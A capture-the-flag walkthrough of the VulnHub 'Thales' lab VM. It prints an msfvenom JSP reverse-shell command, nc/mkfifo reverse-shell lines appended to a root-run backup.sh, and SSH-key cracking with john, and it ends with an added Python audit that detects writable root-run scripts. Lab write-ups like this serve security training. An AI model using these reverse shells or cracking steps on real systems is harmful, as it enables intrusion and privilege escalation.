[vulnhub range] thales:1
2022-07-07 16:24:00 【Nailaoyyds】
Preface
Description
Brief introduction: Open your eyes and look from another angle
Includes 2 flags: user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Environment
Kali: 192.168.56.102
Thales target machine: 192.168.56.101
1. Information gathering
0x00 arp-scan
arp-scan -I eth1 -l # scan the LAN on interface eth1
0x01 nmap scan
The scan turned up two network segments and it is not clear which one is the target, so scan both IPs with nmap
Open ports: 22 and 8080
Visiting the site, a username and password are required
2. Exploitation
0x00 Using msfconsole
In msf, search for tomcat login
Configure the payload
Username tomcat, password role1
Login successful
0x01 Upload files
Looking through the functionality, an upload point was found
Use Kali to generate a WAR file payload for a reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
The upload succeeds; run it
3. Privilege escalation
0x00 Reverse shell
Listen on the port
Upgrade to an interactive shell
sudo -l # requires a password, which is unknown
Found the user Thales under the home directory
The `notes.txt` file points to `/usr/local/bin/backup.sh`; view that file's contents
0x02 Dictionary attack
Found the .ssh folder
It contains a private key; ssh2john.py can turn it into a hash file for cracking
Use ssh2john.py
Run the script
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
The cracked password is vodka06
Switch user
0x03 user.txt
View user.txt: the first flag
notes.txt has root permissions; there may be something useful inside
0x04 Reverse shell
Notice that backup.sh has execute permission, so a reverse shell can be written into it
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
Editing the file contents would replace them outright, so append instead
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
Listen on 9999; after the line is written, the connection comes in on its own
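The root shell in 0x04 and 0x05 depends on a script that runs with root privileges being modifiable by a lower-privileged user. The audit below is an added example, not part of the original post, that flags that condition on a host; it assumes backup.sh is executed as root on a schedule, and the function name `audit_root_script` and its parameters are hypothetical.

```python
import os
import stat

WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def audit_root_script(path, trusted_uids=(0,), stop="/"):
    """Return findings for a script that root executes (assumed, see lead-in).

    Checks the file itself and each directory from its parent up to `stop`:
    anyone who can write the file, or rename entries in a directory above
    it, controls what root runs.
    """
    findings = []
    current = os.path.realpath(path)      # audit what actually gets executed
    stop = os.path.realpath(stop)
    while True:
        st = os.stat(current)
        is_dir = stat.S_ISDIR(st.st_mode)
        if st.st_uid not in trusted_uids:
            findings.append(f"{current}: owned by uid {st.st_uid}")
        # A sticky directory (like /tmp) blocks renames by non-owners,
        # so its group/other write bits are not a finding on their own.
        sticky_dir = is_dir and st.st_mode & stat.S_ISVTX
        if st.st_mode & WRITE_BY_OTHERS and not sticky_dir:
            findings.append(f"{current}: mode {stat.S_IMODE(st.st_mode):04o} "
                            "is group- or world-writable")
        if current == stop or current == os.path.dirname(current):
            return findings
        current = os.path.dirname(current)


if __name__ == "__main__":
    import sys
    # Path taken from the walkthrough; pass other root-run scripts as arguments.
    for target in sys.argv[1:] or ["/usr/local/bin/backup.sh"]:
        try:
            for line in audit_root_script(target) or [f"{target}: ok"]:
                print(line)
        except FileNotFoundError:
            print(f"{target}: not found")
```

Any finding means the script should be owned by root with mode 0755 or stricter, in directories that only root can write. POSIX ACLs are not inspected by this check.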
Summary
What Thales taught:
Using msf for dictionary brute-forcing
Working with an encrypted RSA private key